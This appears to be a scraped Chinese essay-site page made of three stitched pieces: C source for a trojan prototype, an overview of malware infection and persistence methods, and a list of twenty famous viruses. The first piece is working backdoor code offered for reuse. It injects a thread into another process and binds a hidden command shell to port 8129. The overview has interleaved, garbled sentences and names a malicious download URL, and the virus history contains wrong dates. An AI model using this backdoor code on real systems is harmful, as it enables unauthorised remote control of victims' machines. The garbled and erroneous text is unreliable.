篇一:病毒代码大全
制造木马病毒代码大全2008-06-08 19:46 制造木马病毒代码大全 一个简单的木马原型基础代码 添加上自己的XXX,加上变态的壳,做点小修改,就可
以..... #include #pragma comment(lib,"ws2_32.lib") #include #include #pragma comment(lib,"Shlwapi.lib") #include #include #include //参数结构 ; typedef struct _RemotePara { DWORD dwLoadLibrary; DWORD dwFreeLibrary; DWORD dwGetProcAddress; DWORD dwGetModuleHandle; DWORD dwWSAStartup; DWORD dwSocket; DWORD dwhtons; DWORD dwbind; DWORD dwlisten; DWORD dwaccept; DWORD dwsend; DWORD dwrecv; DWORD dwclosesocket; DWORD
dwCreateProcessA; DWORD dwPeekNamedPipe; DWORD dwWriteFile; DWORD dwReadFile; DWORD dwCloseHandle; DWORD dwCreatePipe; DWORD dwTerminateProcess; DWORD dwMessageBox; char strMessageBox[12]; char winsockDll[16]; char cmd[10]; char Buff[4096]; char telnetmsg[60]; }RemotePara; // 提升应用级调试权限 BOOL EnablePrivilege(HANDLE hToken,LPCTSTR
szPrivName,BOOL fEnable); // 根据进程名称得到进程ID DWORD GetPidByName(char *szName); // 远程线程执行体 DWORD __stdcall ThreadProc(RemotePara *Para)
{ WSADATA WSAData; WORD nVersion; SOCKET
listenSocket; SOCKET clientSocket; struct sockaddr_in server_addr; struct sockaddr_in client_addr; int iAddrSize = sizeof(client_addr); SECURITY_ATTRIBUTES sa; HANDLE hReadPipe1; HANDLE hWritePipe1; HANDLE hReadPipe2; HANDLE hWritePipe2; STARTUPINFO si; PROCESS_INFORMATION ProcessInformation; unsigned long lBytesRead = 0; typedef HINSTANCE (__stdcall *PLoadLibrary)(char*); typedef FARPROC (__stdcall *PGetProcAddress)(HMODULE, LPCSTR); typedef HINSTANCE (__stdcall *PFreeLibrary)( HINSTANCE ); typedef HINSTANCE (__stdcall
*PGetModuleHandle)(HMODULE); FARPROC
PMessageBoxA; FARPROC PWSAStartup; FARPROC PSocket; FARPROC Phtons; FARPROC Pbind; FARPROC Plisten; FARPROC Paccept; FARPROC Psend; FARPROC Precv; FARPROC Pclosesocket; FARPROC PCreateProcessA; FARPROC PPeekNamedPipe; FARPROC PWriteFile;
FARPROC PReadFile; FARPROC PCloseHandle; FARPROC PCreatePipe; FARPROC PTerminateProcess; PLoadLibrary LoadLibraryFunc = (PLoadLibrary)Para->dwLoadLibrary; PGetProcAddress GetProcAddressFunc =
(PGetProcAddress)Para->dwGetProcAddress; PFreeLibrary FreeLibraryFunc = (PFreeLibrary)Para->dwFreeLibrary; PGetModuleHandle GetModuleHandleFunc =
(PGetModuleHandle)Para->dwGetModuleHandle; LoadLibraryFunc(Para->winsockDll); PWSAStartup = (FARPROC)Para->dwWSAStartup; PSocket =
(FARPROC)Para->dwSocket; Phtons =
(FARPROC)Para->dwhtons; Pbind =
(FARPROC)Para->dwbind; Plisten =
(FARPROC)Para->dwlisten; Paccept =
(FARPROC)Para->dwaccept; Psend =
(FARPROC)Para->dwsend; Precv =
(FARPROC)Para->dwrecv; Pclosesocket =
(FARPROC)Para->dwclosesocket; PCreateProcessA =
(FARPROC)Para->dwCreateProcessA; PPeekNamedPipe = (FARPROC)Para->dwPeekNamedPipe; PWriteFile = (FARPROC)Para->dwWriteFile; PReadFile =
(FARPROC)Para->dwReadFile; PCloseHandle =
(FARPROC)Para->dwCloseHandle; PCreatePipe =
(FARPROC)Para->dwCreatePipe; PTerminateProcess = (FARPROC)Para->dwTerminateProcess; PMessageBoxA = (FARPROC)Para->dwMessageBox; nVersion =
MAKEWORD(2,1); PWSAStartup(nVersion,
(LPWSADATA)&WSAData); listenSocket =
PSocket(AF_INET, SOCK_STREAM, 0); if(listenSocket == INVALID_SOCKET)return 0; server_addr.sin_family = AF_INET; server_addr.sin_port = Phtons((unsigned short)(8129)); server_addr.sin_addr.s_addr =
INADDR_ANY; if(Pbind(listenSocket, (struct sockaddr *)&server_addr, sizeof(SOCKADDR_IN)) != 0)return 0; if(Plisten(listenSocket, 5))return 0; clientSocket = Paccept(listenSocket, (struct sockaddr *)&client_addr, &iAddrSize); // Psend(clientSocket, Para->telnetmsg, 60, 0);
if(!PCreatePipe(&hReadPipe1,&hWritePipe1,&sa,0))return 0;
if(!PCreatePipe(&hReadPipe2,&hWritePipe2,&sa,0))return 0; ZeroMemory(&si,sizeof(si)); //ZeroMemory 是C 运行库函数,可以直接调用 si.dwFlags =
STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; si.wShowWindow = SW_HIDE; si.hStdInput = hReadPipe2; si.hStdOutput = si.hStdError = hWritePipe1;
if(!PCreateProcessA(NULL,Para->cmd,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformatio n))return 0; while(1)
{ memset(Para->Buff,0,4096);
PPeekNamedPipe(hReadPipe1,Para->Buff,4096,&lBytesRead,0,0); if(lBytesRead) { if(!PReadFile(hReadPipe1, Para->Buff, lBytesRead, &lBytesRead, 0))break; if(!Psend(clientSocket, Para->Buff, lBytesRead, 0))break; }else { lBytesRead=Precv(clientSocket, Para->Buff, 4096, 0); if(lBytesRead <=0 ) break; if(!PWriteFile(hWritePipe2, Para->Buff, lBytesRead, &lBytesRead, 0))break; } } PCloseHandle(hWritePipe2); PCloseHandle(hReadPipe1); PCloseHandle(hReadPipe2); PCloseHandle(hWritePipe1); Pclosesocket(listenSocket); Pclosesocket(clientSocket); // PMessageBoxA(NULL, Para->strMessageBox, Para->strMessageBox, MB_OK); return 0; } int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { const DWORD THREADSIZE=1024*4; DWORD byte_write; void *pRemoteThread; HANDLE hToken,hRemoteProcess,hThread; HINSTANCE hKernel,hUser32,hSock; RemotePara
myRemotePara,*pRemotePara; DWORD pID;
OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken);
篇二:常见的计算机病毒
【安全】常见病毒类型说明及行为分析 0点
1、目前杀毒厂商对恶意程序的分类
nbsp; 木马病毒: TROJ_XXXX.XX
nbsp; 后门程序: BKDR_XXXX.XX
nbsp; 蠕虫病毒: WORM_XXXX.XX
nbsp; 间谍软件: TSPY_XXXX.XX
nbsp; 广告软件: ADW_XXXX.XX
nbsp; 文件型病毒: PE_XXXX.XX
nbsp; 引导区病毒:目前世界上仅存的一种引导区病毒
POLYBOOT-B
2、病毒感染的一般方式
病毒感染系统时,感染的过程大致可以分为:
通过某种途径传播,进入目标系统
自我复制,并通过修改系统设置实现随系统自启动
激活病毒负载的预定功能如:
打开后门等待连接
发起DDOS攻击
进行键盘记录
发送带计算机使用记录电子邮件
2.1 常见病毒传播途径
毒,它们传播、感染系统的方法也有所不同。
nbsp; 计算机病毒传播方式主要有:
ü 电子邮件
ü 网络共享
ü P2P 共享
ü 系统漏洞
ü 浏览网页
ü 移动磁盘传播
ü 打开带毒影音文件
2.1.1电子邮件传播方式
nbsp; HTML正文可能被嵌入恶意脚本,
nbsp; 邮件附件携带病毒压缩文件
nbsp; 利用社会工程学进行伪装,增大病毒传播机会
nbsp; 快捷传播特性 除引导区病毒外,所有其他类型的病毒,无一例外,均要在系统中执行病毒代码,才能实现感染系统的目的。对
例:WORM_MYTOB,WORM_STRATION等病毒
2.1.2 网络共享传播方式
nbsp; 病毒会搜索本地网络中存在的共享,包括默认共享
如ADMIN$ ,IPC$,E$ ,D$,C$
nbsp; 通过空口令或弱口令猜测,获得完全访问权限
病毒自带口令猜测列表
nbsp; 将自身复制到网络共享文件夹中
通常以游戏,CDKEY等相关名字命名
例:WORM_SDBOT 等病毒
2.1.3 P2P共享软件传播方式
nbsp; 将自身复制到P2P共享文件夹
通常以游戏,CDKEY等相关名字命名
nbsp; 通过P2P软件共享给网络用户
nbsp; 利用社会工程学进行伪装,诱使用户下载
例:WORM_PEERCOPY.A,灰鸽子等病毒
2.1.4 系统漏洞传播方式
nbsp; 病毒往往利用系统漏洞进入系统,达到传播的目的。
nbsp; 常被利用的漏洞
– RPC-DCOM 缓冲区溢出 (MS03-026)
– Web DAV (MS03-007)
– LSASS (MS04-011)
– Internet Explorer 中的漏洞(MS08-078)
– 服务器服务中允许远程执行代码的漏洞(MS08-067)
(Local Security Authority Subsystem Service)
例:WORM_MYTOB 、WORM_SDBOT等病毒
2.1.5 网页感染传播方式
主要是通过恶意脚本
网页感染传播方式是当前网络主要的传播方式,这种传播方式有以下几大优点:
1、代码灵活多变
利用直接的JAVA恶意脚本。
利用<iframe>框架代码 nbsp; 由于操作系统固有的一些设计缺陷,导致被恶意用户通过畸形的方式利用后,可执行任意代码,这就是系统漏
利用转译后的base64、ESC、ASCII等方式的代码
2、木马版本更新速度快
ActiveX控件栈溢出漏洞、RealPlayer ierpplug.dll ActiveX控件播放列表名称栈溢出漏洞等漏洞的网页木马
2.1.6 其他常见病毒感染途径:
ü 与影音文件捆绑
ü 与正常软件捆绑
ü 用户直接运行病毒程序
ü 由其他恶意程序释放
目前大多数的木马、间谍软件等病毒都是通过这几种方式进入系统。它们通常都不具备传播性。
2.1.7 广告软件/灰色软件
由于广告软件/灰色软件的定义,它们有时候是由用户主动安装,更多的是与其他正常软件进行绑定。 由于采用网页方式,木马控制者只需要更新后台的木马主程序版本,即可更新木马版本,造成反病毒软件无法察常见的有利用的漏洞包括:MS08-078、MS06-014、联众世界GLIEDown2.dllActive控件任意代码执行漏洞、超
2.1 病毒自启动方式
一般来说,计算机病毒除引导区病毒外,绝大多数病毒感染系统后,都具有自启动特性。
能。
计算机病毒对系统的修改方式有:
q 修改注册表
q 将自身添加为服务
q 将自身添加到启动文件夹
q 修改系统配置文件
计算机对操作系统的修改加载方式有:
q 服务和进程-病毒程序直接运行
q 嵌入系统正常进程-DLL文件和OCX文件等
q 驱动-SYS文件
2.2.1 计算机病毒修改注册表的情况:
病毒在系统中的行为是基于病毒在系统中运行的基础上的,这就决定了病毒必然要通过对系统的修改,实现开机
1、注册表启动
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion下:
RunServices
RunServicesOnce
Run
RunOnce
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion下:
Run
RunOnce
RunServices
以上这些键一般用于在系统启动时执行特定程序
2、通过注册表对程序进行映像劫持
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options
3、通过注册表修改文件关联项
HKEY_CLASSES_ROOT下:
exefileshellopencommand] @=""%1" %*"
comfileshellopencommand] @=""%1" %*"
batfileshellopencommand] @=""%1" %*"
htafileShellOpenCommand] @=""%1" %*"
piffileshellopencommand] @=""%1" %*“
……
例如:病毒将"%1 %*"改为 “virus.exe %1 %*",virus.exe将在打开或运行相应类型的文件时被执行。
2.2.2 修改配置文件
例如:(以病毒名为virus.exe为例)
%windows% wininit.ini中[Rename]节
NUL=c:windowsvirus.exe
将c:windowsvirus.exe设置为NUL,表示让windows在将virus.exe 运行后删除.
Win.ini中的[windows]节
load = virus.exe
run = virus.exe 这两个变量用于自动启动程序。
System.ini 中的[boot]节
Shell = Explorer.exe,virus.exe
Shell变量指出了要在系统启动时执行的程序列表。
所以,在平常我们的安全防护中,需要大家多多关注以上的系统配置文件。
2.2.3 病毒常修改的Bat文件 目前,也经常发现计算机病毒会修改系统的配置文件,如WINDOWS系统的wininit.ini、Win.ini、System.ini。
WINDOWS系统的BAT文件也是可执行文件类型之一,计算机病毒也经常会修改这些文件,来实现病毒传播和例如:
%windows%winstart.bat
该文件在每次系统启动时执行,只要在该文件中写入欲执行的程序,该程序即可在系统启动时自动执行。 还有Autoexec.bat 在DOS下每次都会自启动执行。
所以,这类文件在我们平常的系统维护中,也得特别注意。
2.2.4 修改启动文件夹
毒修改系统启动文件夹有以下两种方式:
1、当前用户的启动文件夹
可以通过如下注册表键获得:
SoftwareMicrosoftWindowsCurrentVersionExplorerShell Folders中的 StartUp 项
2、公共的启动文件夹
可以通过如下注册表键获得:
SoftwareMicrosoftWindowsCurrentVersionExplorerShell Folders中的 Common StartUp 项
病毒可以在该文件夹中放入欲执行的程序,或直接修改其值指向放置有要执行程序的路径。
2.3 常见病毒行为
病毒感染系统后,无疑会对系统做出各种修改和破坏。有时病毒会使受感染的系统出现自动弹出网页、占用高式如何,我们都需要关注的是病毒的隐性行为!
2.3.1 计算机病毒的下载特性-Downloader
如大水牛下载者病毒 计算机病毒非常喜欢修改系统的启动文件夹,将病毒的快捷方式加入启动文件夹,以实现随系统自动启动的目的过高内存资源、自动弹出/关闭窗口、自动终止某些进程(特别是反病毒软件进程)等各种不正常现象。无论病很多木马、后门程序间谍软件会自动连接到Internet某Web站点,下载其他的病毒文件或该病毒自身的更新版本
当系统中此病毒后,病毒会自动下载病毒列表到%SystemRoot%system32nwizs.txt ,通过此列表下载的病毒会被再下载其他的计算机病毒文件。
大水牛病毒下载列表里面就包含:
microsoft.exe (机器狗,专杀能清除)
hosts.exe (是hosts 文件里面免疫了好多网址)
arp.exe(大水牛下载者病毒最新程序)
cq.exe (里面包含黑客木马fei.exe和传奇盗号器lj.exe)
wow.exe (魔兽盗号木马)
ddos.exe (DDOS 工具,会攻击文件中自带的config.txt 里指向的所有地址)
在%UserProfile%Local SettingsTemp 目录下。然后自动连接病毒下载列表的下载地址:http://520sb.cn/dir/ind??_
篇三:20大“臭名昭著”的电脑病毒
20大“臭名昭著”的电脑病毒
无论是个人计算机系统,还是企业计算机系统,无论是局域网环境,还是互联网环境,甚至是现在最新的云计算、物联网,其所要面对的安全威胁最为本质的就是病毒。病毒可以说是一切安全威胁的源头与根源。那么我们来回顾下计算机历史上最为大名鼎鼎的二十大病毒。
1.1971年:CREEPER
首个Creeper病毒是在DEC 10计算机的TOPS TEN操作系统下运作。
2.1985年:ELK CLONER
ELK CLONER是首个在Apple IIe中运作的病毒。这只病毒是由一个15岁的高中生所撰写。
3.1985年:THE INTERNET WORM
THE INTERNET WORM是由Cornell康乃尔大学的一名研究生所撰写,造成了网络的停摆。
4.1988年:PAKISTANI BRAIN
PAKISTANI BRAIN是第一只感染IBM个人计算机的病毒,由来自巴基斯坦的两兄弟所写成。虽然病毒在科幻故事中已为人熟知,这却是首只受媒体大篇幅报导的病毒。
5.1990年:JERUSALEM FAMILY
此病毒约有59个变种,据信来自Jerusalem耶路撒冷大学。
6.1989年:STONED石头
STONED石头是在病毒开始肆虐的第一个10年间散播最广的病毒,stoned是开机程序/.mbr感染程序,会计算从受感染开始的重新启动次数,并显示一则"你的计算机石化啦"的信息。"your computer is now stoned."
7.1990年:DARK AVENGER MUTATION ENGINE
DARK AVENGER MUTATION ENGINE实际上是在1988年写成的,但到了90年代初期才被运用在如POGUE和COFFEESHOP病毒中。这个变种引擎是第一个真正在网络间流传的千面人(Polymorphism)多型式病毒,从此改变了病毒的作用方式。
8.1992年:MICHEANGELO
MICHEANGELO是STONED的变种,挟带了致命性的承载程序。在3月6日,这只病毒将会清除掉硬盘中的前100个区块,让硬盘变成板砖。
9.1995年:WORLD CONCEPT
WORLD CONCEPT是网络第一个Microsoft Word Macro文件宏病毒,Word
Concept会显示一则信息"这就足以表达我的论点""That is enough to prove my point"的信息。此病毒开启了计算机病毒的次世代,由于此计算机病毒降低了黑客的技术门槛,影响深远。
10.1998年:CIH/CHERNOBYL
CIH是迄今为止最具毁灭性的病毒。发生在任何一个月份的26日(依不同的病毒版本为主),会同时清除硬盘,及中毒计算机中的ROM BIOS内存。
11.1999年:Melissa梅莉萨
梅莉萨是首个透过电子邮件散播的主要病毒,开启了网络病毒时代。虽然Melissa不具毁灭性,但所到之处因为会自我复制并塞爆电子邮箱而造成干扰。1999年3月26日晚间MELISSA展开大规模的"全球性感染",一夜之间迫使著名的大型企业关闭他们的电子邮件服务器,纽约时报(NEW YORK TIMES)甚至以"前所未有的互联网病毒风暴"来形容,FBI也对企业界发出呼吁,甚至发出通缉令将逮捕该名病毒作者。
12.2001年:LOVEBUG / I Love You情书
最热门的电子邮件病毒,纯粹由社交工程(Social Engineering)陷阱手法驱动。
13.2001年:Code RED红色警戒
是以一款畅销的高咖啡因无醇饮料为名,该网络病毒不需透过电子邮件或网页来散布。它自己会搜寻并感染有漏洞的计算机。
14.2001年:NIMDA尼姆达病毒
被称为"瑞士万用刀"的病毒,使用缓冲区溢出,电子邮件网络分享等不下10种之方式进入到网络中。
15.2004年:BAGEL/NETSKY
这两只病毒会在程序代码中互相较劲,用不堪的脏话隔空喊话,互相攻击对方。每只病毒都分别有上百的变种,及不同数量的新技术和成功纪录,也因此这两只病毒几乎整年皆是新闻话题。
16.2004年:僵尸网络
这些网络的傀儡僵尸战士们让网络犯罪份子们取得了不计其数受感染的计算机,这些计算机皆可在网络中被重新设定来转发垃圾信息,感染新的受害者,偷取数据,让坏人可以利用来运作。
17.2005年:ZOTOB
ZOTOB病毒只会感染未经修补的windows2000系统,但也拿下了数个主要的媒体网站,包括CNN和New York Time纽约时报。
18.2005年:Rootkit
广义来说,Rootkit其实是一项技术,用来隐藏恶意进程、文档或者网络用户。已成为恶意软件世界中最受欢迎的隐匿工具。利用操作系统底层技术使恶意软件隐形。
19.2007年:STORM WORM
STORM WORM透过上千的覆式流程,最后形成了世界最大的僵尸网络。一度认为共有高达1千5百万台计算机同时遭到感染,受地下犯罪世界所操控。
20.2007年:ITALIAN JOB
ITALIAN JOB不是单一的恶意软件,而是使用以MPACK为名的预先包装工具套组进行协调攻击。手法包括劫持超过上万的网站,植入能窃取用户数据的恶意软件(Data Stealing Malware)。
免费论文网友情提示:本网站所有内容为共享上传提供,不涉及任何商业利益,本站对此不承担任何保证责任!
Copyright © www.csmayi.cn Corporation, All Rights Reserved 共享时代 共享你我他 版权所有